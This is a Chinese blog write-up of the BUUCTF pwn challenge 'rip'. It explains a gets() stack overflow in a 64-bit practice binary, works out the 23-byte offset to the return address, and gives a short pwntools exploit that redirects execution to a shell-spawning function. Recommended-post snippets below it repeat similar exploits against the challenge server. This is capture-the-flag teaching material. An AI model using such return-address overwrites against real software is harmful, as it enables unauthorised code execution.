BUUCTF_PWN - rip

最新推荐文章于 2024-06-13 21:31:31 发布
最新推荐文章于 2024-06-13 21:31:31 发布
阅读量719 收藏 2
点赞数
分类专栏: # BUUCTF CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46009088/article/details/110679011
版权
BUUCTF 同时被 2 个专栏收录
17 篇文章 2 订阅
订阅专栏
CTF
17 篇文章 0 订阅
订阅专栏

BUUCTF_PWN - rip

查看程序保护模式和文件基本信息
在这里插入图片描述没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序

IDA载入

找到main函数F5:
在这里插入图片描述发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍:

get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,并不知道数组有多少个元素,一旦过长就会覆盖栈中的其他数据。

通过这个思路我们查看一下 s 的最大能够装下多少字符
在这里插入图片描述
画个示意图如下:
在这里插入图片描述
所以我们只要输入超过0xF(char s)+0x8(前栈帧EBP)个字符就能覆盖到返回地址

看shift+F12里面的字符串然后再查看交叉找到拿到shell的地址
在这里插入图片描述
EXP编写:

from pwn import *

p = remote('x',x)
payload = b'a' * 23 + p64(0x401186)
p.sendline(payload)

p.interactive()
kkqqooww
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5647
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUUCTF -rip
weixin_56301399的博客
07-20 386
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
buuctf-rip
最新发布
Nike_name的博客
06-13 344
利用get危险函数和system/bin/sh 的栈溢出
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4917
BUU CTF PWN 入门知识详解
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1283
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Out_of_Hand__Attacks_Against_PHP_Environments-Powerful_PHP_Pwn_Primitives.pdf
08-08
当前web应用漏洞变得越来越复杂。对于这些流行网站和应用所用到的底层编程语言和框架的理解程度,对是否能够发现高危漏洞起到重要作用。本议题中,将会深入探讨PHP 7.4的一些最新feature,以及如何利用这些feature去...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1106
(写得好详细我好爱(为什么payload有两种写法于。
[buuctf] rip
zn106414的博客
03-31 686
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3849
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
BUUCTF|rip
cm_zl
04-30 2125
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1417
⭐ 【buuctfpwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【题目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
pwn的初学记录
limenzzz的博客
10-19 491
pwn的基础题目学习
BUUCTF pwnrip
Cfoxer的博客
02-15 228
计算覆盖位数,因为get内容为s所以此处应该为s位数15(0xf-0x0),加上rbp(栈底指针寄存器)大小8位,一共为23位。直接得到思路,栈溢出覆盖rip,使返回地址变成fun函数的地址,执行systen(/bin/sh),getshell。查看main函数发现危险函数gets推断为栈溢出漏洞。发现文件为64位elf可执行文件。发现并没有开启任何的保护。
CTF-pwn上的一次远程本地链接
半岛铁盒的博客
04-29 798
命令ssh -p 29662 CTFMan@node3.buuoj.cn 常规命令 ssh user@192.168.1.100 这里 -p的作用是: 一般ssh定义的端口号是22,若是有所改动就用-p + 改动的端口号
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值